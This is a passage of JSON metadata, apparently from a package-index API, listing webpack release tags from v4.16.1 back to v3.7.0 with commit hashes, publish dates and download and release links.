.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":nul